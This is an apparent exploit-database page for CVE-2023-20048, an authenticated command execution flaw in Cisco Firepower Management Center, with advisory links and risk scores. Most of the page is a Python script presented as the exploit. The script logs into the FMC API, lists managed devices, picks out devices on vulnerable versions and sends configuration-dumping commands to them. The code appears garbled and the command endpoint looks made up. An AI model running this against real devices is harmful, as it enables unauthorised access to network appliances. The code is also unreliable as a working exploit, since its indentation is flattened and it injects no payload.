Cisco Firepower Management Center Remote Command Execution

🗓️ 13 Mar 2024 00:00:00Reported by Abdualhadi KhalifaType

packetstorm🔗 packetstormsecurity.com👁 280 Views

Cisco Firepower Management Center Remote Command Execution from 12/06/2023, Versions: 6.2.3.18, 6.4.0.16, 6.6.7.1, CVE-2023-2004

Reporter	Title	Published	Views	Family All 15
0day.today	Cisco Firepower Management Center < 6.6.7.1 - Authenticated Remote Code Execute Exploit	12 Mar 202400:00	–	zdt
Circl	CVE-2023-20048	3 Nov 202312:21	–	circl
Cisco	Cisco Firepower Management Center Software Command Injection Vulnerability	1 Nov 202316:00	–	cisco
CNNVD	Cisco Firepower Management Center Security Vulnerability	1 Nov 202300:00	–	cnnvd
CVE	CVE-2023-20048	1 Nov 202317:04	–	cve
Cvelist	CVE-2023-20048	1 Nov 202317:04	–	cvelist
Exploit DB	Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE	12 Mar 202400:00	–	exploitdb
EUVD	EUVD-2023-24227	3 Oct 202520:07	–	euvd
GithubExploit	Exploit for Incorrect Authorization in Cisco Secure_Firewall_Management_Center	22 Sep 202516:02	–	githubexploit
NVD	CVE-2023-20048	1 Nov 202318:15	–	nvd

`# Exploit Title: [Cisco Firepower Management Center]  
# Google Dork: [non]  
# Date: [12/06/2023]  
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)  
# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]  
# CVE : [CVE-2023-20048]  
  
import requests  
import json  
  
# set the variables for the URL, username, and password for the FMC web services interface  
fmc_url = "https://fmc.example.com"  
fmc_user = "admin"  
fmc_pass = "cisco123"  
  
# create a requests session to handle cookies and certificate verification  
session = requests.Session()  
session.verify = False  
  
# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token  
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"  
response = session.post(token_url, auth=(fmc_user, fmc_pass))  
  
# check the response status and extract the access token and refresh token from the response headers  
# set the access token as the authorization header for the subsequent requests  
try:  
if response.status_code == 200:  
access_token = response.headers["X-auth-access-token"]  
refresh_token = response.headers["X-auth-refresh-token"]  
session.headers["Authorization"] = access_token  
else:  
print("Failed to get tokens, status code: " + str(response.status_code))  
exit()  
except Exception as e:  
print(e)  
exit()  
  
# set the variable for the domain id  
# change this to your domain id  
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"  
  
# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC  
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"  
response = session.get(devices_url)  
  
# check the response status and extract the data as a json object  
try:  
if response.status_code == 200:  
data = response.json()  
else:  
print("Failed to get devices, status code: " + str(response.status_code))  
exit()  
except Exception as e:  
print(e)  
exit()  
  
# parse the data to get the list of device names and URLs  
devices = []  
for item in data["items"]:  
device_name = item["name"]  
device_url = item["links"]["self"]  
devices.append((device_name, device_url))  
  
# loop through the list of devices and send a GET request to the URL of each device to get the device details  
for device in devices:  
device_name, device_url = device  
response = session.get(device_url)  
  
# check the response status and extract the data as a json object  
try:  
if response.status_code == 200:  
data = response.json()  
else:  
print("Failed to get device details, status code: " + str(response.status_code))  
continue  
except Exception as e:  
print(e)  
continue  
  
# parse the data to get the device type, software version, and configuration URL  
device_type = data["type"]  
device_version = data["metadata"]["softwareVersion"]  
config_url = data["metadata"]["configURL"]  
  
# check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability  
# use the values from the affected products section in the security advisory  
if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:  
print("Device " + device_name + " is vulnerable to CVE-2023-20048")  
  
# create a list of commands that you want to execute on the device  
commands = ["show version", "show running-config", "show interfaces"]  
device_id = device_url.split("/")[-1]  
  
# loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device  
# replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute  
for command in commands:  
command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command  
response = session.post(command_url)  
  
# check the response status and extract the data as a json object  
try:  
if response.status_code == 200:  
data = response.json()  
else:  
print("Failed to execute command, status code: " + str(response.status_code))  
continue  
except Exception as e:  
print(e)  
continue  
  
# parse the data to get the result of the command execution and print it  
result = data["result"]  
print("Command: " + command)  
print("Result: " + result)  
  
else:  
print("Device " + device_name + " is not vulnerable to CVE-2023-20048")  
  
  
`

13 Mar 2024 00:00Current

7.4High risk

Vulners AI Score7.4

CVSS 3.19.9

EPSS0.04552

SSVC